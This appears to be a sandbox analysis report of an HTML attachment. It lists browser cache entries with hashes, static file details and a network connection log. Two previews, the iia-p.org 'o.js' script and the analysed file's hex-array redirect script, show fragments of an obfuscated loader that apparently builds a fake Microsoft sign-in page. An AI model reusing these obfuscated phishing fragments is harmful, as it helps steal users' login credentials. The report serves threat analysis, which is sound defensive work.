SSDEEP:	1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
MD5:	A09E13EE94D51C524B7E2A728C7D4039
SHA1:	0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
SHA-256:	160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
SHA-512:	F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
Preview:	/! jQuery v3.3.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t\|\|r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?l[c.call(e)]\|\|"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
URL:	https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65356)
Category:	downloaded
Size (bytes):	698780
Entropy (8bit):	4.303376707888899
Encrypted:	false
SSDEEP:	6144:/6omS9C8UjUvDVXE7oc/AH/xpRSnJUiZ63lhD5jm:F9C856/AJpRx5m
MD5:	BFFC6023835E717C0348C41583E56EBA
SHA1:	5EEECA669E300C13EF45B44E2322EA154A1D17D5
SHA-256:	D2FEC0E2942F49DD3CAD4650431D550D761F11DDED17834D4835768C2CA730C0
SHA-512:	F8A67D30D682FCA3E62667573DE5EF577C8B7D45DB14899FDE750C40DEC789FFB4D5F02003276DCF6417F00B4163236FEAFDD1BA56C43D71E4BB4FFEA2184052
Malicious:	false
URL:	https://use.fontawesome.com/releases/v5.0.9/js/all.js
Preview:	/!. Font Awesome Free 5.0.9 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.!function(){"use strict";var c={};try{"undefined"!=typeof window&&(c=window)}catch(c){}var l=(c.navigator\|\|{}).userAgent,h=void 0===l?"":l,v=c,z=(~h.indexOf("MSIE")\|\|h.indexOf("Trident/"),"___FONT_AWESOME___"),e=function(){try{return!0}catch(c){return!1}}(),a=[1,2,3,4,5,6,7,8,9,10],m=a.concat([11,12,13,14,15,16,17,18,19,20]);["xs","sm","lg","fw","ul","li","border","pull-left","pull-right","spin","pulse","rotate-90","rotate-180","rotate-270","flip-horizontal","flip-vertical","stack","stack-1x","stack-2x","inverse","layers","layers-text","layers-counter"].concat(a.map(function(c){return c+"x"})).concat(m.map(function(c){return"w-"+c}));var s=v\|\|{};s[z]\|\|(s[z]={}),s[z].styles\|\|(s[z].styles={}),s[z].hooks\|\|(s[z].hooks={}),s[z].shims\|\|(s[z].shims=[]);var t=s[z],f=Object.assign\|\|function(c){for(var l=1;l<arguments.

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	114178
Entropy (8bit):	3.0100836220795317
Encrypted:	false
SSDEEP:	1536:Le+O4yEAYXWVX3wZyildbQhyLx3Z/dqLuY09hZaNoQsOMf8iuuoMQw+CwQwfwbw9:q03C
MD5:	A59B10485D743AAECB180F7CBAFA9E12
SHA1:	3DCF56AC3BD015599E838E1E969AFAEE9B1CE0C3
SHA-256:	1F600FB26B3310DA5013601DE6F43D708F25F5DF91377CA78EA1A82F8344543F
SHA-512:	50635AAFD3EDF8AF8A652A2E3796D94D8458EAC184B8206DE4E6C50645F033EE85FDF3736287CA7BABD274259ADB3A914EB6E196A87F57B4A841AFB883BB00D3
Malicious:	false
URL:	https://iia-p.org/lh/o.js
Preview:	var _0x6b29=["\x25\x33\x43\x73\x63\x72\x69\x70\x74\x25\x32\x30\x6c\x61\x6e\x67\x75\x61\x67\x65\x25\x33\x44\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x25\x33\x45\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x27\x25\x32\x35\x33\x43\x21\x44\x4f\x43\x54\x59\x50\x45\x25\x32\x35\x32\x30\x68\x74\x6d\x6c\x25\x32\x35\x33\x45\x25\x32\x35\x30\x41\x25\x32\x35\x33\x43\x68\x74\x6d\x6c\x25\x32\x35\x33\x45\x25\x32\x35\x30\x41\x25\x32\x35\x33\x43\x68\x65\x61\x64\x25\x32\x35\x33\x45\x25\x32\x35\x30\x41\x25\x32\x35\x33\x43\x6c\x69\x6e\x6b\x25\x32\x35\x32\x30\x72\x65\x6c\x25\x32\x35\x33\x44\x25\x32\x35\x32\x32\x73\x68\x6f\x72\x74\x63\x75\x74\x25\x32\x35\x32\x30\x69\x63\x6f\x6e\x25\x32\x35\x32\x32\x25\x32\x35\x32\x30\x68\x72\x65\x66\x25\x32\x35\x33\x44\x25\x32\x35\x32\x32\x68\x74\x74\x70\x73\x25\x32\x35\x33\x41\x25\x32\x35\x32\x46\x25\x32\x35\x32\x46\x6c\x6f\x67\x69\x6e\x63\x64\x6e\x2e\x6d\x73\x61\x75\x74\x68\x2e\x6e\x65\x74\x25\x32\x35\x32\x46\x31\x36\x2e\x

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	dropped
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (1995)
Entropy (8bit):	3.462692063418512
TrID:	HTML Application (8008/1) 100.00%
File name:	DOC-Zcns1G_.html
File size:	2'190 bytes
MD5:	1e32618fcf29bd29fe194054d4d84ca0
SHA1:	dbee4324588daf5ccbe2a9b66e15c580ddfbe640
SHA256:	149ed57259e2ed5e5b2b20e84c4ff006ca08c964794df235a933554114a9b930
SHA512:	47faf2f7977e3491e745990f6fa0d63c5e1f657076bd9999d1ec83bb5a5d39f052a9f4deb70ce4d65d563c74901aa282dc66ae11410d3570d21675a1b1146a29
SSDEEP:	48:J4mTGEW7XsHk8J4jMBAArj5YAMTtWLoGzSfATkllGMQ:96EWkk8WIuAiG0Q
TLSH:	4441318B43D70E32B8139D51D55E9C51AFFF88E4C5784489B80E72E6ABBEB4C10528DC
File Content Preview:	<script>. let x = ['3C', '73', '63', '72', '69', '70', '74', '3E', 'A', '20', '20', '20', '20', '64', '6F', '63', '75', '6D', '65', '6E', '74', '2E', '6C', '6F', '63', '61', '74', '69', '6F', '6E', '2E', '68', '72', '65', '66', '3D', '22', '23'

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 06:27:56.648983002 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 26, 2024 06:27:56.742583990 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 06:28:05.979285955 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:05.979352951 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:05.979619980 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:05.980256081 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:05.980288982 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.352855921 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 06:28:06.433516026 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.433883905 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:06.433914900 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.435401917 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.435472965 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:06.436403990 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:06.436499119 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.436754942 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:06.436773062 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.567688942 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:06.869870901 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.869905949 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.869914055 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.869930983 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.869975090 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:06.870045900 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:06.870083094 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:06.999123096 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.088917017 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.088931084 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.088943005 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.089004993 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.089313030 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.089320898 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.089339972 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.089370012 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.089399099 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.089673042 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.089682102 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.089694977 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.089724064 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.089749098 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.125581980 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.125591040 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.125606060 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.125639915 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.125669956 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.308172941 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.308185101 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.308206081 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.308264971 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.308325052 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.308470964 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.308480024 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.308526993 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.308783054 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.308789968 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.308844090 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.309463978 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.309472084 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.309536934 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.309952974 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.309966087 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.310028076 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.344934940 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.344944954 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.345022917 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.345530987 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.345779896 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.526807070 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.526911974 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.527183056 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.527225971 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.527245998 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:07.527276039 CEST	443	49733	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:07.527324915 CEST	49733	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.020385981 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.020441055 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:09.020513058 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.020787001 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.020812035 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:09.252676010 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.252743959 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.252800941 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.259814024 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.259838104 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.268919945 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.268961906 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.269020081 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.269480944 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.269490004 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.269536018 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.270216942 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.270232916 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.270556927 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.270567894 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.404648066 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:09.405117035 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.405160904 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:09.406796932 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:09.406896114 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.409244061 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.409333944 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:09.459728003 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.459752083 CEST	443	49741	142.250.217.164	192.168.2.4
Apr 26, 2024 06:28:09.508090019 CEST	49741	443	192.168.2.4	142.250.217.164
Apr 26, 2024 06:28:09.710622072 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.711101055 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.711129904 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.714730024 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.714804888 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.715339899 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.715481043 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.715487003 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.715538979 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.724617004 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.724904060 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.724932909 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.726418972 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.726480961 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.728327990 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.731260061 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.731268883 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.732978106 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.733042955 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.759608984 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.759623051 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:09.806857109 CEST	49742	443	192.168.2.4	192.232.216.145
Apr 26, 2024 06:28:09.969089031 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.969247103 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.969346046 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.969357967 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.970196009 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:09.970319986 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:09.970335960 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.012026072 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.012208939 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.012219906 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.057761908 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.404166937 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.404202938 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.404285908 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.404321909 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.404356003 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.422216892 CEST	49743	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.422250032 CEST	443	49743	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.453478098 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.453571081 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.453655958 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.454981089 CEST	49744	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.454998970 CEST	443	49744	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.517039061 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.517075062 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.517133951 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.518013954 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.518027067 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.519798040 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:10.519880056 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:10.519958973 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:10.521855116 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:10.521893978 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:10.591116905 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.591155052 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.591275930 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.591511011 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.591567993 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.591629028 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.591933012 CEST	49748	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.591969013 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.592370033 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:10.592384100 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:10.830563068 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:10.830648899 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:10.837759018 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:10.837806940 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:10.838356018 CEST	443	49746	23.34.16.106	192.168.2.4
Apr 26, 2024 06:28:10.882056952 CEST	49746	443	192.168.2.4	23.34.16.106
Apr 26, 2024 06:28:10.970515013 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.008788109 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.008809090 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.009255886 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.017498970 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.017576933 CEST	443	49745	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.017651081 CEST	49745	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.030158043 CEST	443	49742	192.232.216.145	192.168.2.4
Apr 26, 2024 06:28:11.043350935 CEST	443	49747	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.047110081 CEST	443	49748	13.107.213.41	192.168.2.4
Apr 26, 2024 06:28:11.050321102 CEST	49747	443	192.168.2.4	13.107.213.41
Apr 26, 2024 06:28:11.050333977 CEST	443	49747	13.107.213.41	192.168.2.4
